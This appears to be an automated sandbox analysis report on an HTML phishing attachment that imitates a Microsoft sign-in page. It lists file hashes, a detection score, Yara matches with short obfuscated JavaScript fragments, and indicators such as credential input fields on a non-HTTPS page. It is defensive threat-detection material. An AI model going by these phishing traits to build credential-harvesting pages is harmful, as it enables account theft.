Loading ...

Play interactive tourEdit tour

Windows Analysis Report Wire_Confirmation-Copy.html

Overview

General Information

Sample Name:Wire_Confirmation-Copy.html
Analysis ID:502520
MD5:178e42df69354b451950ff0ac8c5184a
SHA1:daa4c6acb324bc7d07d3d54901426965da969043
SHA256:b8e0e4c1035f5ae15f113041fe392e5665cac8ce3c5c35e874aa04ae50cd2952
Infos:

Most interesting Screenshot:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Multi AV Scanner detection for submitted file
HTML document with suspicious title
Phishing site detected (based on logo template match)
Phishing site detected (based on image similarity)
Yara signature match
Invalid 'forgot password' link found
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found
JA3 SSL client fingerprint seen in connection with other malware
HTML body contains low number of good links
Invalid T&C link found
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5360 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'C:\Users\user\Desktop\Wire_Confirmation-Copy.html' MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 6424 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9407411632917985520,10635128510584544942,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1916 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Wire_Confirmation-Copy.htmlSUSP_obfuscated_JS_obfuscatorioDetect JS obfuscation done by the js obfuscator (often malicious)@imp0rtp3
  • 0x1b46:$c8: while(!![])
  • 0x1b64:$d1: parseInt(_0x3a4da2(0x82))/0x1*(parseInt(_0x3a4da2(0xa8))/0x2)+-parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-
  • 0x1b83:$d1: parseInt(_0x3a4da2(0xa8))/0x2)+-parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+
  • 0x1ba3:$d1: parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+
  • 0x1bc2:$d1: parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+parseInt(_0x3a4da2(0x86))/0x9+-
  • 0x1be2:$d1: parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+parseInt(_0x3a4da2(0x86))/0x9+-parseInt(_0x3a4da2(0x7d))/0xa*(
Wire_Confirmation-Copy.htmlJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: Wire_Confirmation-Copy.htmlVirustotal: Detection: 12%Perma Link

    Phishing:

    barindex
    Phishing site detected (based on favicon image match)Show sources
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlMatcher: Template: microsoft matched with high similarity
    Yara detected HtmlPhish10Show sources
    Source: Yara matchFile source: Wire_Confirmation-Copy.html, type: SAMPLE
    Source: Yara matchFile source: 72168.0.pages.csv, type: HTML
    Phishing site detected (based on logo template match)Show sources
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlMatcher: Template: microsoft matched
    Phishing site detected (based on image similarity)Show sources
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlMatcher: Found strong image similarity, brand: Microsoft image: 72168.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Invalid link: Forgot my password
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Invalid link: Forgot my password
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.htmlHTTP Parser: Invalid link: Privacy & cookies